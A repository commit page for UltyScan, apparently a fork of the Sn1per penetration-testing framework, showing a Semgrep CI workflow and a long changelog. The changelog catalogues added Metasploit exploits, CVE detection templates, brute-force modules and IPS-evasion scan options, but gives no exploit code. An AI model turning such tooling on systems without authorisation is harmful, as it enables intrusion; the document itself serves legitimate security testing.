dennii/UltyScan
1
0
Fork 0
mirror of https://github.com/DeNNiiInc/UltyScan.git synced 2026-04-17 18:26:00 +00:00
Code Issues Packages Projects Releases Wiki Activity

UltyScan Documentation Overhaul

Browse Source
This commit is contained in:
DeNNiiInc
2026-01-01 16:33:22 +11:00
commit f046dee832
294 changed files with 250370 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

24
.github/workflows/semgrep.yml vendored Normal file
View File

@@ -0,0 +1,24 @@
on:
workflow_dispatch: {}
pull_request: {}
push:
branches:
- main
- master
paths:
- .github/workflows/semgrep.yml
schedule:
# random HH:MM to avoid a load spike on GitHub Actions at 00:00
- cron: 2 23 * * *
name: Semgrep
jobs:
semgrep:
name: semgrep/ci
runs-on: ubuntu-20.04
env:
SEMGREP_APP_TOKEN: ${{ secrets.SEMGREP_APP_TOKEN }}
container:
image: returntocorp/semgrep
steps:
- uses: actions/checkout@v3
- run: semgrep ci

621
CHANGELOG.md Normal file
View File

@@ -0,0 +1,621 @@
## CHANGELOG:
* v9.2 - Added Tomba.io API integration via OSINT mode (Credit: @benemohamed)
* v9.2 - Fixed issue with gau tool not installing and updated GAU setting in confs
* v9.2 - Updated python2 to python3
* v9.2 - Removed Slurp tool
* v9.2 - Added BlackArch Dockerfile (Credit: @AnonymousWP)
* v9.2 - Updated DockerFile to latest Kali release (Credit: @AnonymousWP)
* v9.1 - Fixed issue with dirsearch installation/command syntax update
* v9.1 - Updated Nuclei sc0pe templates
* v9.1 - Fixed issue with Nuclei sc0pe parsers not working
* v9.1 - Fixed issue with GAU installer/commmand not working
* v9.1 - Fixed issue with passive URL fetching
* v9.1 - Fixed issue with nuclei not being installed
* v9.1 - Removed error in hackertarget URL fetching
* v9.1 - Added dnsutils to installer to fix missing deps
* v9.1 - Fixed issue with gau in webscan modes not running
* v9.1 - Updated subfinder to latest version
* v9.1 - Added new email spoofing security checks to OSINT mode (-o)
* v9.1 - Removed spoofcheck.py
* v9.1 - Updated timeout settings for curl which was causing sockets/scans to hang
* v9.1 - Fixed issue with Nuclei symlink missing in installer
* v9.1 - Fixed issue with Nuclei sc0pe parser not parsing results correctly
* v9.1 - Fixed issue with Dirsearch not running due to invalid command settings
* v9.1 - Fixed issue with Nuclei templates not being installed
* v9.1 - Fixed issue with enum4linux command not being installed
* v9.1 - Fixed HackerTarget API integration
* v9.1 - Fixed issue with ping command not being installed
* v9.1 - Fixed issue with carriage returns in conf
* v9.1 - Fixed issue with DNS resolution in 'discover' mode scans causing duplicate hosts
* v9.1 - Fixed issue with bruteforce running automatically due to changes in conf file
* v9.1 - Added verbose scan notifications for disabled conf options
* v9.1 - Updated default aux mode options in default sniper.conf
* v9.0 - Added Fortinet FortiGate SSL VPN Panel Detected sc0pe template
* v9.0 - Added CVE-2020-17519 - Apache Flink Path Traversal sc0pe template
* v9.0 - Added RabbitMQ Management Interface Detected sc0pe template
* v9.0 - Added CVE-2020-29583 Zyxel SSH Hardcoded Credentials via BruteX
* v9.0 - Removed vulnscan NMap CSV updates/downloads to save space/bandwidth
* v9.0 - Added Nuclei sc0pe parser
* v9.0 - Added Nuclei vulnerability scanner
* v9.0 - Added Wordpress WPScan sc0pe vulnerability parser
* v9.0 - Fixed issue with wrong WPscan API key command
* v9.0 - Added CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal sc0pe template
* v9.0 - Renamed AUTO_VULNSCAN setting to "VULNSCAN" in sniper.conf to perform vulnerability scans via 'normal' mode
* v8.9 - Tuned sniper.conf around performance for all scans and recon modes
* v8.9 - Added out of scope options to config
* v8.9 - Added automatic HTTP/HTTPS web scans and vulnerability scans to 'normal' mode
* v8.9 - Added SolarWinds Orion Panel Default Credentials sc0pe template
* v8.9 - Added SolarWinds Orion Panel sc0pe template
* v8.9 - Fixed issue with UDP port scans not working
* v8.9 - Fixed issue with theHarvester not running on Kali 2020.4
* v8.9 - Added WPScan API support
* v8.9 - Added CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure sc0pe template
* v8.9 - Added CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal sc0pe template
* v8.9 - Removed verbose error for chromium on Ubuntu
* v8.9 - Added CVE-2020-8209 - Citrix XenMobile Server Path Traversal sc0pe template
* v8.9 - Fixed F+ in CSP Not Enforced sc0pe template
* v8.9 - Added CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS sc0pe template
* v8.9 - Fixed issue with dnscan not working in Kali 2020.3
* v8.9 - Fixed issue with screenshots not working in Ubuntu 2020
* v8.9 - Added Frontpage Service Password Disclosure sc0pe template
* v8.9 - Removed Yasuo tool
* v8.8 - Fixed issue with webscreenshot on Kali 2020.3+
* v8.8 - Fixed error in install.sh for theharvester sym link
* v8.8 - Fixed issue with flyover mode not capturing web screenshots
* v8.8 - Added automatic 'flyover' scans of all discovered domains for 'recon' mode
* v8.8 - Added static grep searching rules of all URL's and sub-domains (see sniper.conf for details)
* v8.8 - Added verbose status logging to flyover mode showing HTTP status/redirect/title, etc.
* v8.8 - Added integration for Port Scanner Add-on for Sn1per Professional
* v8.8 - Added enhanced scanning of all unique dynamic URL's via InjectX fuzzer
* v8.8 - Added CVE-2020-25213 - WP File Manager File Upload sc0pe template
* v8.8 - Added cPanel Login Found sc0pe template
* v8.8 - Added Wordpress WP-File-Manager Version Detected sc0pe template
* v8.8 - Added VMware vCenter Unauthenticated Arbitrary File Read sc0pe template
* v8.8 - Added PHP Composer Disclosure sc0pe template
* v8.8 - Added Git Config Disclosure sc0pe template
* v8.8 - Added updated NMap vulscan DB files
* v8.8 - Added CVE-2020-9047 - exacqVision Web Service Remote Code Execution sc0pe template
* v8.8 - Removed UDP port scan settings/options and combined with full portscan ports
* v8.8 - Added CVE-2019-8442 - Jira Webroot Directory Traversal sc0pe template
* v8.8 - Added CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection sc0pe template
* v8.8 - Added CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution sc0pe template
* v8.8 - Added CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint sc0pe template
* v8.8 - Added Smuggler HTTP request smuggling detection
* v8.8 - Added CVE-2020-0618 - Remote Code Execution SQL Server Reporting Services sc0pe template
* v8.8 - Added CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix sc0pe template
* v8.8 - Added Jaspersoft Detected sc0pe template
* v8.8 - Added improved dirsearch exclude options to all web file/dir searches
* v8.8 - Fixed naming conflict for theharvester
* v8.8 - Created backups of all NMap HTML reports for fullportonly scans
* v8.8 - Added line limit to GUA URL's displayed in console
* v8.7 - Added AvantFAX LOGIN Detected sc0pe template
* v8.7 - Updated web file bruteforce lists
* v8.7 - Added updated Slack API integration/notifications
* v8.7 - Added Arachni, Nikto, Nessus, NMap + 20 passive sc0pe vulnerability parsers
* v8.7 - Added CVE-2020-15129 - Open Redirect In Traefik sc0pe template
* v8.7 - Added MobileIron Login sc0pe template
* v8.7 - Added Revive Adserver XSS sc0pe template
* v8.7 - Added IceWarp Webmail XSS sc0pe template
* v8.7 - Added Mara CMS v7.5 XSS sc0pe template
* v8.7 - Added Administrative Privilege Escalation in SAP NetWeaver sc0pe template
* v8.7 - Added Magento 2.3.0 SQL Injection sc0pe template
* v8.7 - Added CVE-2020-15920 - Unauthenticated RCE at Mida eFramework sc0pe template
* v8.7 - Added CVE-2019-7192 - QNAP Pre-Auth Root RCE sc0pe template
* v8.7 - Added CVE-2020-10204 - Sonatype Nexus Repository RCE sc0pe template
* v8.7 - Added CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection sc0pe template
* v8.7 - Added CVE-2020-2140 - Jenkin AuditTrailPlugin XSS sc0pe template
* v8.7 - Added CVE-2020-7209 - LinuxKI Toolset 6.01 Remote Command Execution sc0pe template
* v8.7 - Added CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution sc0pe template
* v8.7 - Added Sitemap.xml Detected sc0pe template
* v8.7 - Added Robots.txt Detected sc0pe template
* v8.7 - Added AWS S3 Public Bucket Listing sc0pe template
* v8.7 - Fixed logic error in stealth mode recon scans not running
* v8.7 - Added CVE-2020-7048 - WP Database Reset 3.15 Unauthenticated Database Reset sc0pe template
* v8.7 - Fixed F- detection in Wordpress Sc0pe templates
* v8.7 - Added CVE-2020-11530 - Wordpress Chop Slider 3 Plugin SQL Injection sc0pe template
* v8.7 - Added CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE sc0pe template
* v8.7 - Added CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass sc0pe template
* v8.6 - Added new Sn1per configuration flow that allows persistent user configurations and API key transfer
* v8.6 - Updated port lists to remove duplicate ports error and slim down list
* v8.6 - Updated PHP to 7.4
* v8.6 - Added CVE-2020-12720 - vBulletin Unauthenticaed SQLi
* v8.6 - Added CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection
* v8.6 - Added CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server
* v8.6 - Added CVE-2020-3187 - Citrix Unauthenticated File Deletion
* v8.6 - Added CVE-2020-8193 - Citrix Unauthenticated LFI
* v8.6 - Added CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection
* v8.6 - Added CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
* v8.6 - Added CVE-2020-9484 - Apache Tomcat RCE by deserialization
* v8.6 - Added Cisco VPN scanner template
* v8.6 - Added Tiki Wiki CMS scanner template
* v8.6 - Added Palo Alto PAN OS Portal scanner template
* v8.6 - Added SAP NetWeaver AS JAVA LM Configuration Wizard Detection
* v8.6 - Added delete task workspace function to remove running tasks
* v8.6 - Added CVE-2020-3452 - Cisco ASA/FTD Arbitrary File Reading Vulnerability Sc0pe template
* v8.6 - Updated theharvester command to exclude github-code search
* v8.6 - Updated theharvester installer to v3.1
* v8.6 - Added urlscan.io API to OSINT mode (-o)
* v8.6 - Added OpenVAS package to install.sh
* v8.6 - Added Palo Alto GlobalProtect PAN-OS Portal Sc0pe template
* v8.6 - Fixed issue with Javascript downloader downloading localhost files instead of target
* v8.6 - Added CVE-2020-5902 F5 BIG-IP RCE sc0pe template
* v8.6 - Added CVE-2020-5902 F5 BIG-IP XSS sc0pe template
* v8.6 - Added F5 BIG-IP detection sc0pe template
* v8.6 - Added interesting ports sc0pe template
* v8.6 - Added components with known vulnerabilities sc0pe template
* v8.6 - Added server header disclosure sc0pe template
* v8.6 - Added SMBv1 enabled sc0pe template
* v8.6 - Removed verbose comment from stealth scan
* v8.5 - Added manual installer for Metasploit
* v8.5 - Added Phantomjs manual installer
* v8.5 - Added sc0pe template to check for default credentials via BruteX
* v8.5 - Added fullportscans to all 'web' mode scans to ensure full port coverage
* v8.5 - Fixed issue with 2nd stage OSINT scans not running
* v8.5 - Added port values to sc0pe engine to define port numbers
* v8.5 - Fixed issue with LinkFinder not working
* v8.5 - Fixed issue with Javascript link parser
* v8.5 - Added phantomjs dependency to fix webscreenshots on Ubuntu
* v8.5 - Added http-default-accounts NMap NSE to check for default web credentials
* v8.5 - Fixed several issues with install.sh to resolve deps on Ubuntu and Kali 2020.2
* v8.5 - Removed larger wordlists to reduce install size of Sn1per
* v8.5 - Added 20+ new active/passive sc0pe templates
* v8.5 - Fixed issue with installer on latest Kali and Docker builds
* v8.5 - Fixed custom installer for Arachni
* v8.5 - Fixed Dockerfile with updated Kali image (CC. @stevemcilwain)
* v8.4 - Added project "Sc0pe" active/passive vulnerability scanner
* v8.4 - Added 68 new active sc0pe templates
* v8.4 - Added 14 new passive sc0pe templates
* v8.4 - Added OWASP ZAP API integration
* v8.4 - Added 8 new Sn1per configuration templates (see /usr/share/sniper/conf/)
* v8.4 - Added Gau (https://github.com/lc/gau)
* v8.4 - Added rapiddns subdomain retrieval
* v8.4 - Updated web content wordlists
* v8.4 - Improved efficiency of 'web' and 'recon' mode scans
* v8.4 - Disabled legacy Metasploit web exploits (check Sn1per conf to re-enable)
* v8.4 - Fixed issue with dirsearch asterisk being used incorrectly
* v8.4 - Fixed issue with airstrike mode not updated Sn1per Professional v8.0 host list
* v8.4 - Fixed issue with webtech re.error: invalid group reference 1 at position 130
* v8.3 - Added Github subdomain retrieval (requires API key/conf options enabled)
* v8.3 - Added NMAP_OPTIONS setting to sniper.conf to configure optional NMap scan settings
* v8.3 - Added option to specify custom Sn1per configuration via (-c) switch
* v8.3 - Created several custom config files to select from, including: bug_bounty_quick, bug_bounty_max_javascript, super_stealth_mode, webpwn_only + more
* v8.3 - Added workspace --export option to backup/export a workspace
* v8.3 - Added flyover mode tuning options to sniper.conf
* v8.3 - Added GitGraber automated Github leak search (https://github.com/hisxo/gitGraber)
* v8.3 - Added static Javascript parsing for sub-domains, URL's, path relative links and comments
* v8.3 - Added js-beautifier
* v8.3 - Added LinkFinder Javascript link finder (https://github.com/GerbenJavado/LinkFinder)
* v8.3 - Added fprobe HTTP probe checker (https://github.com/theblackturtle/fprobe)
* v8.3 - Added Cisco RV320 and RV325 Unauthenticated Remote Code Execution CVE-2019-1653 MSF exploit
* v8.3 - Improved performance of 'stealth' and 'recon' modes
* v8.3 - Updated default port lists
* v8.3 - Improved performance of all port scans
* v8.3 - Added fix for missing Amass package
* v8.3 - Added sniper.conf options for OPENVAS_HOST and OPENVAS_PORT selection for remote instances
* v8.3 - Improved 'vulnscan' mode via OpenVAS to scan the same asset multiple times with improved error handling
* v8.2 - Added root priv check to sniper script to run
* v8.2 - Added NMap port change notifications via Slack
* v8.2 - Fixed issue with firefox not loading on Kali Linux 2020.1
* v8.2 - Fixed issue with Masswebscan mode not working
* v8.2 - Added Rails file exposure exploit CVE-2019-5418
* v8.2 - Updated wordlist selections to fingerprint common vulnerable applications
* v8.2 - Added h8mail compromised credentials check to OSINT (-o) mode
* v8.2 - Added Kali start menu app & icon for Sn1per
* v8.2 - Added check for insecure SSL/TLS connections
* v8.2 - Added NMAP_OPTIONS setting in ~/.sniper.conf to configure optional NMap settings
* v8.2 - Fixed issue with ManageEngine MSF exploit payload
* v8.2 - Added Spyse sub-domain enumeration tool (https://github.com/zeropwn/spyse.py)
* v8.2 - Fixed issue with Subjack (open /src/github.com/haccer/subjack/fingerprints.json: no such file or directory)
* v8.1 - Added Citrix Gateway Arbitary Code Execution CVE-2019-19781 vulnerability detection
* v8.1 - Added Pulse Secure VPN Arbitrary File Disclosure CVE-2019-11510 exploit
* v8.1 - Added --data-length=50 for NMap IPS evasion
* v8.1 - Removed NMap vulscan script due to F+ results
* v8.1 - Fixed issue with CRT.SH sub-domain retrieval
* v8.1 - Updated Kali Linux keyring package
* v8.1 - Fixed "[: ==: unary operator expected" in all code
* v8.1 - Updated Sn1per Professional autoload settings
* v8.1 - Updated web brute force wordlists
* v8.1 - Removed null and debug errors from passive spider API output
* v8.1 - Updated Commoncrawl index repo
* v8.1 - Updated DockerFile repository
* v8.1 - Fixed issue with -dh flag to delete host with Sn1per Pro v8.0
* v8.1 - Fixed issue with subfinder missing
* v8.1 - Fixed issue with 7zip missing
* v8.1 - Added check for Ubuntu to install.sh automatically
* v8.0 - Added ASnip tool to retrieve ASN's via 'recon' mode
* v8.0 - Added Shodan sub-domain lookup
* v8.0 - Added script timeout flag for NMap scripts
* v8.0 - Fixed issue with dnsenum getting stuck on gathering dns info stage
* v8.0 - Added option to force upgrade/install.sh without user prompt (ie. ./install.sh force)
* v8.0 - Fixed issue with theHarvester package on Ubuntu systems
* v8.0 - Fixed error "[: ==: unary operator expected" in all modes
* v8.0 - Added net-tools package for Ubuntu OS deps
* v7.4 - Added LDAP anomyous search to port 389/tcp checks (Shoutout @D0rkerDevil)
* v7.4 - Added Java RMI dump registry scan checks and exploits to port 8001/tcp (Shoutout @D0rkerDevil)
* v7.4 - Added CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure MSF module
* v7.4 - Added virtualhost scanning via web mode
* v7.4 - Added Gobuster
* v7.4 - Addd URLCrazy DNS alterations check to OSINT mode
* v7.4 - Added Ultratools Whois Lookups to OSINT mode
* v7.4 - Added Email-Format.com Email Retreival to OSINT mode
* v7.4 - Added Metasploit OSINT email retrieval to OSINT mode
* v7.4 - Added Hackertarget URL API retrieval to web modes
* v7.4 - Fixed error in massvulnscan mode
* v7.4 - Fixed issue with webscreenshot.py not running
* v7.4 - Added reverse whois DNS search via AMass
* v7.4 - Added MassDNS IP's to master sorted IP list
* v7.4 - Fixed issue with MassDNS installation
* v7.4 - Fixed bad path with DNSGen
* v7.4 - Fixed issue with AMass not running
* v7.4 - Improved performance of AltDNS/DNSgen/MassDNS retrieval
* v7.4 - Changed webscreenshot.py setting to use chrome browser and increased timeout
* v7.4 - Fixed issue with missing xmlstarlet package for OpenVAS scans
* v7.4 - Improved active web spider URL consolidation
* v7.3 - Added CVE-2019-15107 Webmin <= 1.920 - Unauthenticated RCE MSF exploit
* v7.3 - Added massdns plugin
* v7.3 - Added altdns plugin
* v7.3 - Added dnsgen plugin
* v7.3 - Updated web file/dir wordlists from public exploits and honeypots
* v7.3 - Added time stamps to all commands
* v7.3 - Removed CloudFront from domain hijacking checks
* v7.3 - Removed snmp-brute.nse script due to scan issues
* v7.3 - Fixed issue with discover scan workspace names
* v7.3 - Fixed issue with DockerFile (sed: can't read /usr/bin/msfdb: No such file or directory)
* v7.3 - Fixed issue with installer on docker not having pip installed
* v7.3 - Fixed issue with port 161 not being referenced correctly in scans
* v7.2 - Added experimental OpenVAS API integration
* v7.2 - Improved Burpsuite 2.x API integration with vuln reporting
* v7.2 - Added hunter.io API integration to recon mode scans
* v7.2 - Added Cisco IKE Key Disclosure MSF exploit
* v7.2 - Added JBoss MSF vuln scanner module
* v7.2 - Added Apache CouchDB RCE MSF exploit
* v7.2 - Added IBM Tivoli Endpoint Manager POST Query Buffer Overflow exploit
* v7.2 - Added Java RMI MSF scanner
* v7.2 - New scan mode "vulnscan"
* v7.2 - New scan mode "massportscan"
* v7.2 - New scan mode "massweb"
* v7.2 - New scan mode "masswebscan"
* v7.2 - New scan mode "massvulnscan"
* v7.2 - Added additional Slack API notification settings
* v7.2 - Improved NMap port detection and scan modes
* v7.2 - Fixed issue with Censys API being enabled by default
* v7.2 - Fixed verbose errors in subjack/subover tools
* v7.2 - Fixed issue with NMap http scripts not working
* v7.1 - Added BlueKeep CVE-2019-0708 MSF scanner
* v7.1 - Added automatic workspace generation for single target scans
* v7.1 - Added new slack.sh API integration script
* v7.1 - Added differential Slack notifications for new domains, new URL's and various scan outputs
* v7.1 - Added vulners and vulscan NMap scripts
* v7.1 - Added installer and support for Debian, Parrot and Ubuntu OS (install_debian.sh) (CC. @imhaxormad)
* v7.1 - Fixed various issues with the DockerFile
* v7.1 - Fixed/added Metasploit LHOST/LPORT values to all exploits based on sniper.conf settings
* v7.1 - Fixed issue with Amass/Golang 1.11 not installing correctly
* v7.0 - Added "webscan" mode for automated Burpsuite 2.x and Arachni web application scans only
* v7.0 - Added Slack API notifications (Disabled by default..check ~/.sniper.conf)
* v7.0 - Added new command switch to add daily, weekly or monthly sniper scheduled scans... check README
* v7.0 - Added scheduled scan tasks command switch (Needs additional configuration to setup... check README)
* v7.0 - Added Axis2 authenticated deployer MSF exploit
* v7.0 - Added Axis2 login brute force module
* v7.0 - Added subjack tool to check for subdomain hijacking
* v7.0 - Added sorted IP lists under $LOOT_DIR/ips/ips-all-sorted.txt
* v7.0 - Added subnet retrieval for all 'recon' mode scans under $LOOT_DIR/nmap/subnets-$TARGET.txt
* v7.0 - Added Webscreenshot.py and disabled cutycapt from default config
* v7.0 - Added Gobuster (Disabled by default..check ~/.sniper.conf)
* v7.0 - Fixed issue with SubOver not working due to bad path
* v7.0 - Fixed issue with flyover mode running 2x
* v6.3 - Added Drupal RESET Unserialize RCE CVE-2019-6340
* v6.2 - Added Glassfish Admin traversal MSF exploit
* v6.2 - Added ElasticSearch Java Injection MSF RCE exploit
* v6.2 - Added WebTech web fingerprinting tool
* v6.2 - Added censys subdomain retrieval and API key config
* v6.2 - Added project sonar sub-domain retrieval
* v6.2 - Added command switch to remove workspace (-d)
* v6.2 - Added command switch to remove host (-dh)
* v6.2 - Added DockerFile to run Sn1per in Docker (CC. Hariom Vashisth <hariom.devops@gmail.com>)
* v6.2 - Changed option to automatically import all NMap XML's into Metasploit's DB
* v6.2 - Changed option to automatically load Sn1per Professional's report when scans complete
* v6.2 - Added config option to enable/disable subdomain hijacking checks in sniper.conf
* v6.2 - Fixed issue with sniper --list command having invalid reference
* v6.2 - Fixed issue with theharvester not running
* v6.1 - Added automated web scanning via Burpsuite Pro 2.x API for all 'web' mode scans
* v6.1 - Added Waybackmachine URL retrieval to all web scans
* v6.1 - Converted all exploits to Metasploit
* v6.1 - Added configuration options to set LHOST/LPORT for all Metasploit exploits in sniper.conf
* v6.1 - Added improved web brute forcing dictionaries for all scan modes
* v6.1 - Added individual logging for all tools under the loot directory
* v6.1 - Added new sniper.conf options to enabled/disable all plugins and change settings per user
* v6.1 - Fixed issue with CMSMap install/usage
* v6.1 - Fixed issue with WPScan gem dependency missing (public_suffix)
* v6.1 - Fixed timeout setting in cutycapt
* v6.1 - Fixed issue with theharvester not running correctly
* v6.1 - Fixed issue with Amass not running due to invalid command line options in latest release
* v6.1 - Fixed issue with Sn1per Professional notepad.html missing
* v6.1 - Cleaned up plugins and install dependencies list
* v6.0 - Improved scan options for discover mode scans
* v6.0 - Fixed issue with pip3 dependency package missing
* v6.0 - Removed iceweasel from install.sh to fix apt error
* v5.9 - Fixed issue with auto updates not notifying users of updates
* v5.8 - Fixed issue with subfinder not working due to lack of wordlist switch
* v5.8 - Fixed missing osint directory/file paths
* v5.7 - Added libSSH auth bypass scanner CVE-2018-10933
* v5.7 - Added HTTP PUT method RCE MSF exploit
* v5.7 - Added sniper.conf scan configuration file to customize sniper environments by user
* v5.7 - Added modular scan mode source files
* v5.7 - Updated wordlists for improved performance and results
* v5.7 - Fixed issue with DNScan using an invalid path
* v5.6 - Changed automatic report generation to "ON" for Sn1per Pro users
* v5.5 - Added new multi-threaded high speed "flyover" mode added
* v5.5 - Added new scan status mode via (sniper --status) command
* v5.5 - Apache Struts CVE-2018-11776 RCE exploit
* v5.5 - Added Android Insecure ADB RCE auto exploit
* v5.5 - Added Apache Tomcat CVE-2017-12617 RCE exploit
* v5.5 - Added Oracle WebLogic WLS-WSAT Component Deserialisation RCE CVE-2017-10271 MSF exploit
* v5.5 - Added BlackWidow web application scanner with INJECTX fuzzer
* v5.5 - Added CVE-2018-15473 SSH user enumeration script
* v5.5 - Minor wordlist updates for web file brute forcing
* v5.4 - Updated Golang in install.sh
* v5.3 - Updated AMass repo in install.sh
* v5.3 - Removed CloudFail
* v5.3 - Fixed issue with subfinder missing brute force list
* v5.3 - Fixed issue with invalid dnsscan reference
* v5.2 - Added SubOver subdomain takeover scanner
* v5.2 - Added Subfinder subdomain enumeration tool
* v5.2 - Added Amass subdomain enumeration tool
* v5.2 - Added configurable modules/plugins to sniper script
* v5.2 - Added MS17-010 SMB Etternal Blue MSF exploit
* v5.2 - Added MSF Postgresql login scanner
* v5.2 - Added passive web spider
* v5.2 - Added WebDav metasploit aux modules
* v5.2 - Added NetBIOS NMap/MSF enumeration
* v5.2 - Added SMB MSF enumeration
* v5.2 - Added NSF MSF enumeration
* v5.2 - Added SSH MSF enumeration
* v5.2 - Added BadBlue Passthru MSF exploit
* v5.2 - Added SMB GPP MSF aux module
* v5.2 - Added Intel AMT MSF scanner
* v5.2 - Added MySQL MSF scanner
* v5.2 - Added MS03-026 DCOM RCE MSF exploit
* v5.2 - Added VNC no auth MSF scanner
* v5.2 - Added FTP MSF version scanner
* v5.2 - Added FTP anonymous access MSF scanner
* v5.2 - Added MS12-020 RDP MSF scanner
* v5.2 - Added MS10-061 Spoolss MSF exploit
* v5.2 - Added MS15-034 Sys Memory Dump MSF exploit
* v5.2 - Added MS06-040 Netapi MSF exploit
* v5.2 - Added MS05-039 PNP MSF exploit
* v5.2 - Added MS12-020 Max Channels RDP scanner
* v5.2 - Added JBoss status MSF scanner
* v5.2 - Added Apache Struts 2 REST Plugin XStream RCE check
* v5.2 - Added Apache Tomcat UTF8 Traversal MSF exploit
* v5.2 - Added Apache OPTIONS Bleed MSF exploit
* v5.2 - Added HP ILO Auth Bypass MSF exploit
* v5.2 - Added Jooma Comfields SQL injection MSF exploit
* v5.1 - Added dnscan to install.sh and updated sniper references which were broken
* v5.1 - Changed default brute force list for dnscan to improve performance of scans
* v5.1 - Removed CloudHunter and SubOver references (CC. 爱上平顶山)
* v5.0 - Added Sn1per Pro reporting interface (see https://sn1persecurity.com for more details)
* v5.0 - Added GPON Router RCE auto exploit
* v5.0 - Added Cloudapp.net Azure subdomain takeover check
* v5.0 - Added Cisco ASA Directory Traversal auto exploit (CVE-2018-0296)
* v5.0 - Added Wig Web Information Gatherer
* v5.0 - Added Dirsearch with custom dirsearch wordlists (quick, normal, full)
* v5.0 - Fixed bug in installer/upgrade which copied the local dir contents to the install dir
* v5.0 - Improved scan performance while taking web screenshots
* v5.0 - Fixed repo issue with Slurp (Shoutz to @ifly53e)
* v5.0 - Fixed issues with wrong ports listed in port scans (Shoutz to @ifly53e)
* v5.0 - Minor code fixes and typos corrected (Shoutz to @ifly53e)
* v5.0 - Updated "discover" mode scans for improved performance
* v4.5 - Added Apache Struts 2 CVE-2017-9805 and CVE-2017-5638 detection
* v4.5 - Added dirsearch web/file brute forcing
* v4.5 - Added smart file/directory brute forcing to all scan modes.
* v4.5 - Added subdomain brute force scan option to Sublist3r scan.
* v4.4 - Fixed issue with sniper nuke and airstrike modes not running.
* v4.4 - Added improved SNMP checks via NMap/Metasploit.
* v4.4 - Resolved dependency issue for nfs-common package.
* v4.4 - Fixed bug in sniper -fp command switch.
* v4.3 - Fixed bug in version info.
* v4.2 - Fixed bad merge in 4.1 causing sniper to break.
* v4.1 - Fixed a few bugs with various command line switches for airstrike and nuke modes.
* v4.1 - Fixed issue with path relative file inclusion via the -f flag. You can now include just the local filename (sniper -f targets.txt).
* v4.0 - Added new command switch options for all sniper scans (see --help for details)
* v4.0 - Added HTML formatted report for all workspaces to display screenshots, headers, reports and open ports
* v4.0 - Added optional scan options such as --recon, --osint, --fullportonly --bruteforce, etc. to selectively enable scan modules. (see --help for details)
* v4.0 - Improved Yasou scan options to include existing NMap XML files
* v4.0 - Added automatic HTML/TXT/PDF reporting for all scans by default
* v4.0 - Updated default workspace directory to store all loot files by $TARGET name or $WORKSPACE alias
* v4.0 - Added screenshot and header retrieval to loot storage
* v4.0 - Updated NMAP SMB enum script
* v3.0 - Improved performance of various sniper modes
* v3.0 - Added Aquatone domain flyover tool
* v3.0 - Added slurp S3 public AWS scanner
* v3.0 - Updated Sub-domain hijacking site list
* v3.0 - Changed look and feel of console output to help readability
* v3.0 - Added online/offline check to implement changes to scans when in online vs. offline mode
* v2.9 - New improved fullportonly scan mode
* v2.9 - Added online check to see if there's an active internet connection
* v2.9 - Changed default browser to firefox to clear up errors in loot commmand
* v2.9 - Created uninstall.sh script to uninstall sniper
* v2.9 - Removed automatic workspace creation per scan
* v2.9 - Added curl timeout in update command to fix lag
* v2.9 - Fixed minor NMap UDP scan flag issue
* v2.9 - Added Metagoofil
* v2.9 - Updated theharvester scan options to include more results
* v2.8 - Improved discovery mode scan performance and output
* v2.8 - Improved fullportonly scan performance
* v2.8 - Improved startup performance options
* v2.8 - Added Cansina web/file brute force tool
* v2.8 - Added webporthttp and webporthttps modes
* v2.8 - Added custerd software enumeration tool
* v2.7 - Fixed issue with sniper update command and install.sh not running
* v2.7 - Fixed errors with GooHak
* v2.7 - Fixed syntax errors in sniper conditional statements
* v2.7 - Added CloudFail
* v2.7 - Fixed issue with [: ==: unary operator expected errors
* v2.6 - Added Blackarch Linux support
* v2.6 - Added $BROWSER variable to set default browser
* v2.5g - Updated README with update command
* v2.5f - Fixes for various bugs reported and fixed by @ifly53e (https://github.com/1N3/Sn1per/pull/89)
* v2.5e - Fixed issue with port 3128/tcp checks (CC. @ifly53e)
* v2.5d - Added searchsploit option for (-v) to search all terms (CC. @ifly53e)
* v2.5c - Added various improvements to 'discover' mode scans
* v2.5b - Removed NMap script checks for 'fullportonly' mode
* v2.5a - Added auto-updates to check and download new versions
* v2.5a - Fixed issue with install.sh to resolve pip aha error
* v2.5a - Added libxml2-utils to install.sh to meet dependencies
* v2.5 - Added HTML report generation via sniper 'loot' command
* v2.5 - Added automatic NMap searchsploit integration to find exploits
* v2.5 - Added various improvements to Sn1per discovery scan mode
* v2.5 - Fixed issue with IIS BoF NMap script (CC. ifly53e)
* v2.4f - Fixed issue with upper NMap port range(CC. DaveW)
* v2.4e - Added NMap no ping switch to all scans
* v2.4d - Fixed issue with rpcinfo install script
* v2.4d - Fixed issue with Arachni install script
* v2.4c - Added loot and $TARGET sanity checks (CC. @menzow)
* v2.4b - Fixed issue with discovery scan output file (CC. @ifly53e)
* v2.4b - Fixed issue with Intel AMT RCE port list
* v2.4a - Added all NMap script checks via 'fullportonly' mode
* v2.4a - Added JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Metasploit exploit
* v2.4a - Added Java RMI RCE NMap/Metasploit detection
* v2.4a - Added INTEL-SA-00075 (Intel AMT) vulnerability NMap script
* v2.4 - Added detection for open X11 servers
* v2.4 - Added IIS6 Win2k3 RCE NMap script
* v2.4 - Added option to disable Google Hacking queries via Firefox
* v2.3d - Fixed issue with loot command
* v2.3c - Added Apache Struts 2 RCE NMap script
* v2.3c - Added Apache Struts 2 RCE NMap exploit
* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
